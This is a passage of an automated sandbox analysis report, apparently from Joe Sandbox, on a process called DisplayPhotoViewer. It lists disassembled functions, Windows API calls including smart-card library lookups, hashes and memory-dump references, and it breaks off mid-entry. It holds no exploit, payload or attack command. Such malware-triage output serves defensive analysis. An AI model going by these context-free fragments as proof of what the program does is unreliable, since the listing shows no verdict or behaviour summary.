                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle$FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 736098846-0
                                                                                                    • Opcode ID: 9c89013b8c280b56233b4b5749a5fe16c2546702e79584811f605015e4725f63
                                                                                                    • Instruction ID: 3002e96f0c2727c8da2bfa61eca77fe4a9da450f6d8c3e0cda743c7ae30cc92c
                                                                                                    • Opcode Fuzzy Hash: 9c89013b8c280b56233b4b5749a5fe16c2546702e79584811f605015e4725f63
                                                                                                    • Instruction Fuzzy Hash: 35F097B1E00B009BC621DF6E98C4ADAFBE9BF99310F64495EE5AAD3214C770A5508B64
                                                                                                    Function 1112F1F0 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(?,00000000,75BF3760,110F0690), ref: 1112F1F8
                                                                                                    • GlobalDeleteAtom.KERNEL32 ref: 1112F206
                                                                                                      • Part of subcall function 1110A800: FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1110A80A
                                                                                                      • Part of subcall function 1110A800: SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 1110A820
                                                                                                    • DeleteObject.GDI32(00000000), ref: 1112F23A
                                                                                                    • DeleteObject.GDI32(?), ref: 1112F244
                                                                                                      • Part of subcall function 11090E00: _memset.LIBCMT ref: 11090E2F
                                                                                                      • Part of subcall function 11090E00: FreeLibrary.KERNEL32(00000000,?,75C04920,111114D7,00000002), ref: 11090E3A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Delete$ObjectWindow$AtomDestroyFindFreeGlobalLibraryMessageSend_memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 370783926-0
                                                                                                    • Opcode ID: b777d086da97d39b518410fb75578ca07f674c32d0a97b7475f14864b8c8e2c2
                                                                                                    • Instruction ID: a76483d6c816efb8a36a55dc47320649c97d82e7e54d96ea217a1b35ee874967
                                                                                                    • Opcode Fuzzy Hash: b777d086da97d39b518410fb75578ca07f674c32d0a97b7475f14864b8c8e2c2
                                                                                                    • Instruction Fuzzy Hash: C5F0277AE0062157C211ABA5B880A2FF7E9EFC6708B164029F955D3204DB30F801C7E2
                                                                                                    Function 1110B5F0 Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 1110B602
                                                                                                    • SetCursor.USER32(00000000,?,?,11118766,00000000,00000000,1111CD19,00000000,00000000,00000000,00000000,View,BlankAll,00000000,00000000,00000004), ref: 1110B609
                                                                                                    • DestroyCursor.USER32(?), ref: 1110B620
                                                                                                    • DestroyCursor.USER32(?), ref: 1110B62D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$Destroy$Load
                                                                                                    • String ID:
                                                                                                    • API String ID: 3167891023-0
                                                                                                    • Opcode ID: 0348c1c41e354c0e123513b489998ed03ccef0d18190e7628a540ef026c427a5
                                                                                                    • Instruction ID: 7cd37d66b1bc2fff238246fe0c1f1aa789fd838ae4d551c5a08b92b5087e1da5
                                                                                                    • Opcode Fuzzy Hash: 0348c1c41e354c0e123513b489998ed03ccef0d18190e7628a540ef026c427a5
                                                                                                    • Instruction Fuzzy Hash: BDE0E575944A009BE6118F759CCC96AF7E9BBC8605F604919E56DD2108C735A4404B28
                                                                                                    Function 1107D500 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 248COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 1107D060: IsDBCSLeadByte.KERNEL32(00000000,?,00000000,1107D23A,?,0000005C), ref: 1107D07C
                                                                                                    • CompareStringA.KERNEL32(00000400,00000000,?,0000000A,?,?,?,?,?,0000000A,?,?,?,?,?,?), ref: 1107D70B
                                                                                                      • Part of subcall function 11159A6A: __isdigit_l.LIBCMT ref: 11159A8F
                                                                                                    • _strncmp.LIBCMT ref: 1107D73F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCompareLeadString__isdigit_l_strncmp
                                                                                                    • String ID: {-.
                                                                                                    • API String ID: 3286074029-1528367491
                                                                                                    • Opcode ID: daaa54a5287adec4a301efb348ca6cac978795fa4f269cb3b01d8f4ceadea380
                                                                                                    • Instruction ID: 170bd9261a175a928a26bb04cd9c6825cebcf121a74f9688fe20b7002014cd67
                                                                                                    • Opcode Fuzzy Hash: daaa54a5287adec4a301efb348ca6cac978795fa4f269cb3b01d8f4ceadea380
                                                                                                    • Instruction Fuzzy Hash: 49716CA7D042D65AEB01CE745C8077EFFD99F87208F2441AAECD887241F635DA41C7A6
                                                                                                    Function 11007155 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                    • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110072A7
                                                                                                    • SetFocus.USER32(?), ref: 11007303
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                                                    • String ID: edit
                                                                                                    • API String ID: 1305092643-2167791130
                                                                                                    • Opcode ID: 59aaf59eb348e4addae79803090b519453c8e5563a6a16b419019b07d0d7fe19
                                                                                                    • Instruction ID: 1229cddf10425cdebb75b8096cc580b2dbd2f767477347e18152b491d45ba327
                                                                                                    • Opcode Fuzzy Hash: 59aaf59eb348e4addae79803090b519453c8e5563a6a16b419019b07d0d7fe19
                                                                                                    • Instruction Fuzzy Hash: 9D51C3B5A00606AFE701CF64DC80BABB7E5FB88354F11856DF955C7340EA34EA42CB60
                                                                                                    Function 1109B150 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 131COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,00008005,00000000,00000000,00000000), ref: 1109B1E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FolderPath
                                                                                                    • String ID: Journal$JournalPath
                                                                                                    • API String ID: 1514166925-2350371490
                                                                                                    • Opcode ID: 34954e8540469a835f45626bc573277436e6a41b31ba6959fa39fed501c70415
                                                                                                    • Instruction ID: b45d844c1acece00f1c659d84dacd1ed5bfe2ea01de07a69366dedba25500240
                                                                                                    • Opcode Fuzzy Hash: 34954e8540469a835f45626bc573277436e6a41b31ba6959fa39fed501c70415
                                                                                                    • Instruction Fuzzy Hash: 82418B31E0468E5BDB12CF288CA4FDEFBE5EF45714F5045E8D8999B340EA31A908C791
                                                                                                    Function 1070CADE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Info
                                                                                                    • String ID: $
                                                                                                    • API String ID: 1807457897-3032137957
                                                                                                    • Opcode ID: e0d9705fdb5b9866fba42e066b999e572f0ec8fef803e09c93c87641a9180953
                                                                                                    • Instruction ID: 80b9b8a366e59a34421187f495ae13bed8df53d658a780782f89a3bb8f8b314e
                                                                                                    • Opcode Fuzzy Hash: e0d9705fdb5b9866fba42e066b999e572f0ec8fef803e09c93c87641a9180953
                                                                                                    • Instruction Fuzzy Hash: C541693110439C6AEB1A8B14CD96FEB7FE8DB07740F1002E5D689D7162D2718E8ADBB1
                                                                                                    Function 11009170 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 110091E5
                                                                                                    • _memmove.LIBCMT ref: 11009236
                                                                                                      • Part of subcall function 11008CD0: std::_Xinvalid_argument.LIBCPMT ref: 11008CEA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                    • String ID: string too long
                                                                                                    • API String ID: 2168136238-2556327735
                                                                                                    • Opcode ID: b5a6eb10d10b9a78a980a0049a11b009ebdf76fac4f581a1a3a0875712be2e70
                                                                                                    • Instruction ID: d9b61e3262dc26a8808257ab57dea7d8e201e157925bac5ad25fc5681824a997
                                                                                                    • Opcode Fuzzy Hash: b5a6eb10d10b9a78a980a0049a11b009ebdf76fac4f581a1a3a0875712be2e70
                                                                                                    • Instruction Fuzzy Hash: 2B31E932B006145BF721DE5CAC8099AF7E9EBA57B4B10452FE599C7640E7719C4087A0
                                                                                                    Function 11037450 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _strtok.LIBCMT ref: 1103747C
                                                                                                      • Part of subcall function 11158876: __getptd.LIBCMT ref: 11158894
                                                                                                    • _strtok.LIBCMT ref: 1103754C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _strtok$__getptd
                                                                                                    • String ID: ; >
                                                                                                    • API String ID: 715173073-2207967850
                                                                                                    • Opcode ID: b7cec87b61c22be8ccbd516ac323b60fe757af102211055ba52d03befd45c019
                                                                                                    • Instruction ID: a6da872f015bf1adc50648813b04c9e08dbf19e5538444eb1caab3c5958f79e6
                                                                                                    • Opcode Fuzzy Hash: b7cec87b61c22be8ccbd516ac323b60fe757af102211055ba52d03befd45c019
                                                                                                    • Instruction Fuzzy Hash: 05318D36D0069A6FD711CBA48C807CEBFE4DF80369F104494DC94AB281EB70BD4583E1
                                                                                                    Function 1113D880 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _malloc
                                                                                                    • String ID: ..\CTL32\uuencode.c$buf
                                                                                                    • API String ID: 1579825452-878823822
                                                                                                    • Opcode ID: 7cbcd6b46f76cb075aad52bb787a4303fc24aa7148c876d357f0a75fd361ca18
                                                                                                    • Instruction ID: fdbf3a642010763c02270330146063eff10ae5b58976887a19329161abf4dd3f
                                                                                                    • Opcode Fuzzy Hash: 7cbcd6b46f76cb075aad52bb787a4303fc24aa7148c876d357f0a75fd361ca18
                                                                                                    • Instruction Fuzzy Hash: E8218EA7E401421BD70009385C905EEBB85CBA313EBA80375E8FEC33C6E124F51E8791
                                                                                                    Function 110A7840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _memset.LIBCMT ref: 110A7873
                                                                                                      • Part of subcall function 110A7540: LoadLibraryA.KERNEL32(Winscard.dll,00000000,00000000,110A7883,00000000,00000001,00000000,?,11179C68,000000FF,?,110A82D2,?,?,00000200,?), ref: 110A7554
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(00000000,SCardEstablishContext), ref: 110A7571
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardReleaseContext), ref: 110A757E
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardIsValidContext), ref: 110A758C
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardListReadersA), ref: 110A759A
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardGetStatusChangeA), ref: 110A75A8
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardCancel), ref: 110A75B6
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardFreeMemory), ref: 110A75C4
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardConnectA), ref: 110A75D2
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardDisconnect), ref: 110A75E0
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardGetAttrib), ref: 110A75EE
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardControl), ref: 110A75FC
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardListCardsA), ref: 110A760A
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardGetCardTypeProviderNameA), ref: 110A7618
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardBeginTransaction), ref: 110A7626
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardEndTransaction), ref: 110A7634
                                                                                                      • Part of subcall function 110A7540: GetProcAddress.KERNEL32(?,SCardReconnect), ref: 110A7642
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,110A82D2,?,?,00000200,?,?,00000400,?,110ED4E1,00000000,00000000,?,?,?), ref: 110A78E2
                                                                                                    Strings
                                                                                                    • winscard.dll is NOT valid!!!, xrefs: 110A788D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$FreeLoad_memset
                                                                                                    • String ID: winscard.dll is NOT valid!!!
                                                                                                    • API String ID: 212038770-1939809930
                                                                                                    • Opcode ID: 4ed13b7035453f6db123ac5d78a02511e8b393ffc3318abfdb78ec1a6de934ca
                                                                                                    • Instruction ID: f16aa826fcdc3193ce0ac26cf28958aa813333b7baa41c81189a911418b3d6ba
                                                                                                    • Opcode Fuzzy Hash: 4ed13b7035453f6db123ac5d78a02511e8b393ffc3318abfdb78ec1a6de934ca
                                                                                                    • Instruction Fuzzy Hash: 402171B6D00629ABCB11CF95DC45ADFFBB8EB45664F10856AFC15A3340D6356904CAA0
                                                                                                    Function 1100F0F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F10B
                                                                                                      • Part of subcall function 11155C43: std::exception::exception.LIBCMT ref: 11155C58
                                                                                                      • Part of subcall function 11155C43: __CxxThrowException@8.LIBCMT ref: 11155C6D
